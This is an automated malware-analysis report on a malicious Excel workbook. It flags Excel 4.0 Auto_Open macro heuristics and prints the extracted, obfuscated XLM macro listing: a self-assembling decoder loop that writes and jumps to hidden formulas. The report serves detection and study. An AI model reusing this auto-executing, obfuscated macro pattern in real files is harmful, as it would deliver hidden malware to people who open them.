MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6610 bytes |
SHA-256: efec33e8c240cbee767baf3d48098033f35c844b29237f91c89cd281bbdfed83 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - dUhtqwruxSC
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!I139
' 0018 23 LABEL : Cell Value, String Constant - BWPuNaub len=0
' 0018 27 LABEL : Cell Value, String Constant - ihdQEoFVihKr len=0
' 0018 20 LABEL : Cell Value, String Constant - KAoNX len=0
' 0018 27 LABEL : Cell Value, String Constant - KDRdjnHgEsah len=0
' 0018 20 LABEL : Cell Value, String Constant - kMjms len=0
' 0018 25 LABEL : Cell Value, String Constant - LFnMSBcAWL len=0
' 0018 24 LABEL : Cell Value, String Constant - llSoebaXD len=0
' 0018 20 LABEL : Cell Value, String Constant - Lmyug len=0
' 0018 23 LABEL : Cell Value, String Constant - mdxILJDT len=0
' 0018 20 LABEL : Cell Value, String Constant - MiLTY len=0
' 0018 23 LABEL : Cell Value, String Constant - mXHbKHfC len=0
' 0018 21 LABEL : Cell Value, String Constant - NgZOqT len=0
' 0018 25 LABEL : Cell Value, String Constant - oHjbFXEKok len=0
' 0018 23 LABEL : Cell Value, String Constant - pDfHebrw len=0
' 0018 23 LABEL : Cell Value, String Constant - pSCpKXbJ len=0
' 0018 24 LABEL : Cell Value, String Constant - QoLSkXATu len=0
' 0018 22 LABEL : Cell Value, String Constant - WBIEnZl len=0
' 0018 27 LABEL : Cell Value, String Constant - yJTPKATauvPY len=0
' 0018 21 LABEL : Cell Value, String Constant - ZeqEVF len=0
' 0018 26 LABEL : Cell Value, String Constant - zihlIzahlZk len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' dUhtqwruxSC,I48,"SET.NAME("kMjms",VALUE("0"))",""
' dUhtqwruxSC,I52,"SET.NAME("KAoNX",kMjms)",""
' dUhtqwruxSC,I57,"SET.NAME("LFnMSBcAWL",kMjms)",""
' dUhtqwruxSC,I62,"SET.NAME("mdxILJDT",COUNTA(llSoebaXD))",""
' dUhtqwruxSC,I64,"SET.NAME("oHjbFXEKok",COUNTA(pDfHebrw))",""
' dUhtqwruxSC,I68,[],""
' dUhtqwruxSC,I73,"SET.NAME("WBIEnZl","")",""
' dUhtqwruxSC,I76,"KAoNX",""
' dUhtqwruxSC,I81,"SET.NAME("ihdQEoFVihKr",HLOOKUP("*",llSoebaXD,KAoNX,FALSE))",""
' dUhtqwruxSC,I86,"Lmyug",""
' dUhtqwruxSC,I91,"SET.NAME("NgZOqT",kMjms)",""
' dUhtqwruxSC,I94,[],""
' dUhtqwruxSC,I98,"NgZOqT",""
' dUhtqwruxSC,I101,"MiLTY",""
' dUhtqwruxSC,I104,"BWPuNaub",""
' dUhtqwruxSC,I108,"pSCpKXbJ",""
' dUhtqwruxSC,I112,"SET.NAME("QoLSkXATu",VALUE(HLOOKUP("*",pDfHebrw,pSCpKXbJ,FALSE)))",""
' dUhtqwruxSC,I114,"KDRdjnHgEsah",""
' dUhtqwruxSC,I116,"WBIEnZl",""
' dUhtqwruxSC,I119,"LFnMSBcAWL",""
' dUhtqwruxSC,I122,NEXT(),""
' dUhtqwruxSC,I125,"zihlIzahlZk",""
' dUhtqwruxSC,I127,"SET.NAME("f",INT(T(FORMULA(T(WBIEnZl)&"",""&T(zihlIzahlZk)))))",""
' dUhtqwruxSC,I129,"yJTPKATauvPY",""
' dUhtqwruxSC,I132,NEXT(),""
' dUhtqwruxSC,I135,RETURN(),""
' dUhtqwruxSC,I162,"SET.NAME("ZeqEVF",I48)",""
' dUhtqwruxSC,I165,"llSoebaXD",""
' dUhtqwruxSC,I169,"SET.NAME("pDfHebrw",R89C14)",""
' dUhtqwruxSC,I171,"SET.NAME("yJTPKATauvPY",179)",""
' dUhtqwruxSC,I176,"SET.NAME("mXHbKHfC",9)",""
' dUhtqwruxSC,I178,ZeqEVF(),""
' dUhtqwruxSC,I179,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.